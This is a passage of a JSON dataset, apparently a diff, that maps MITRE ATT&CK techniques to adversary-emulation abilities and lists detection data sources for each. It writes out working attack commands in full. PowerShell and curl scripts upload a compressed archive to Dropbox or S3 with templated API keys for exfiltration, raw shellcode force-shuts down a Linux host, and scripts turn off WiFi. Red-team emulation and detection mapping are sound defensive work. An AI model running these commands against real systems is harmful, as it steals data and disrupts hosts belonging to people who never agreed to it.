"LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n", + "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n", + "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n" + ], + "commands": [ + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = $req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n", + "source": "data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml", + "name": "This will exfiltrate an archive to Dropbox." + }, + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n", + "source": "data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml", + "name": "This will exfiltrate an archive to Dropbox." + }, + { + "command": "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n", + "source": "data/abilities/exfiltration/dd4d3d6f-be0a-4d80-ada2-0b7f3228d2dc.yml", + "name": "Use the AWS SDK for GoLang to upload the compressed archive to the provided S3 bucket.\nIt is assumed that the current user credentials have the proper permissions to write to the target S3 bucket.\nRequires the agent to be compiled with the native_aws extension.\nTimeout set to 45 seconds.\n" + }, + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "source": "data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml", + "name": "Exfiltrate the compressed archive to the provided S3 bucket using the AWS CLI. It is assumed that the user\ncredentials configured with AWS CLI have the proper permissions to write to the target S3 bucket.\n" + }, + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "source": "data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml", + "name": "Exfiltrate the compressed archive to the provided S3 bucket using the AWS CLI. It is assumed that the user\ncredentials configured with AWS CLI have the proper permissions to write to the target S3 bucket.\n" + } + ], + "parsed_datasets": [ + { + "id": "3ce95a28-25fc-4a7e-a0cd-0fdb190e2081", + "name": "Exfil Compressed Archive to Dropbox", + "description": "This will exfiltrate an archive to Dropbox.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.002", + "name": "Exfiltration to Cloud Storage" + }, + "platforms": { + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = $req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n" + } + }, + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "dd4d3d6f-be0a-4d80-ada2-0b7f3228d2dc", + "name": "Exfil Compressed Archive to S3 via Golang", + "description": "Use the AWS SDK for GoLang to upload the compressed archive to the provided S3 bucket.\nIt is assumed that the current user credentials have the proper permissions to write to the target S3 bucket.\nRequires the agent to be compiled with the native_aws extension.\nTimeout set to 45 seconds.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.002", + "name": "Exfiltration to Cloud Storage" + }, + "platforms": { + "linux,windows,darwin": { + "native": { + "command": "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "e7bf5dc7-62e4-48b2-acf8-abaf8734c19c", + "name": "Exfil Compressed Archive to S3 via AWS CLI", + "description": "Exfiltrate the compressed archive to the provided S3 bucket using the AWS CLI. It is assumed that the user\ncredentials configured with AWS CLI have the proper permissions to write to the target S3 bucket.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.002", + "name": "Exfiltration to Cloud Storage" + }, + "platforms": { + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "cleanup": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 rm s3://#{s3.source.name}/$RemoteName;\n" + } + }, + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "cleanup": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 rm s3://#{s3.source.name}/$RemoteName;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1537", + "command_list": [ + "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n", + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n" + ], + "commands": [ + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n", + "source": "data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml", + "name": "Transfer the compressed archive from one S3 bucket to another S3 bucket via AWS CLI. It is assumed that the proper\npolicies and security rules are in place to allow reading from the source bucket and writing to the destination\nbucket.\n" + }, + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n", + "source": "data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml", + "name": "Transfer the compressed archive from one S3 bucket to another S3 bucket via AWS CLI. It is assumed that the proper\npolicies and security rules are in place to allow reading from the source bucket and writing to the destination\nbucket.\n" + } + ], + "parsed_datasets": [ + { + "id": "ba0deadb-97ac-4a4c-aa81-21912fc90980", + "name": "Transfer Compressed Archive to Separate S3 Bucket via AWS CLI", + "description": "Transfer the compressed archive from one S3 bucket to another S3 bucket via AWS CLI. It is assumed that the proper\npolicies and security rules are in place to allow reading from the source bucket and writing to the destination\nbucket.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1537", + "name": "Transfer Data to Cloud Account" + }, + "platforms": { + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n" + } + }, + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot creation", + "description": "A snapshot was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot modification", + "description": "A snapshot was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "snapshot" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "modified", + "relationship": "created", + "target_data_element": "cloud storage object" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage creation", + "description": "A cloud storage was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage creation", + "description": "A cloud storage was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "cloud storage object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1499", + "command_list": [ + "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n", + "./wifi.sh off\n", + ".\\wifi.ps1 -Off\n" + ], + "commands": [ + { + "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n", + "source": "data/abilities/impact/0821b0b0-7902-4a7b-8052-80bda5a43684.yml", + "name": "Force shutdown a target system using Process Injection and raw shellcode" + }, + { + "command": "./wifi.sh off\n", + "source": "data/abilities/impact/2fe2d5e6-7b06-4fc0-bf71-6966a1226731.yml", + "name": "Turn a computers WIFI off" + }, + { + "command": ".\\wifi.ps1 -Off\n", + "source": "data/abilities/impact/2fe2d5e6-7b06-4fc0-bf71-6966a1226731.yml", + "name": "Turn a computers WIFI off" + } + ], + "parsed_datasets": [ + { + "id": "0821b0b0-7902-4a7b-8052-80bda5a43684", + "name": "Shutdown Target System", + "description": "Force shutdown a target system using Process Injection and raw shellcode", + "tactic": "impact", + "technique": { + "attack_id": "T1499", + "name": "Endpoint Denial of Service" + }, + "platforms": { + "linux": { + "shellcode_amd64,shellcode_386": { + "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n" + } + } + } + }, + { + "id": "2fe2d5e6-7b06-4fc0-bf71-6966a1226731", + "name": "Disrupt WIFI", + "description": "Turn a computers WIFI off", + "tactic": "impact", + "technique": { + "attack_id": "T1499", + "name": "Endpoint Denial of Service" + }, + "platforms": { + "darwin": { + "sh": { + "command": "./wifi.sh off\n", + "cleanup": "./wifi.sh on\n", + "payloads": [ + "wifi.sh" + ] + } + }, + "linux": { + "sh": { + "command": "./wifi.sh off\n", + "cleanup": "./wifi.sh on\n", + "payloads": [ + "wifi.sh" + ] + } + }, + "windows": { + "psh": { + "command": ".\\wifi.ps1 -Off\n", + "cleanup": ".\\wifi.ps1 -On\n", + "payloads": [ + "wifi.ps1" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + 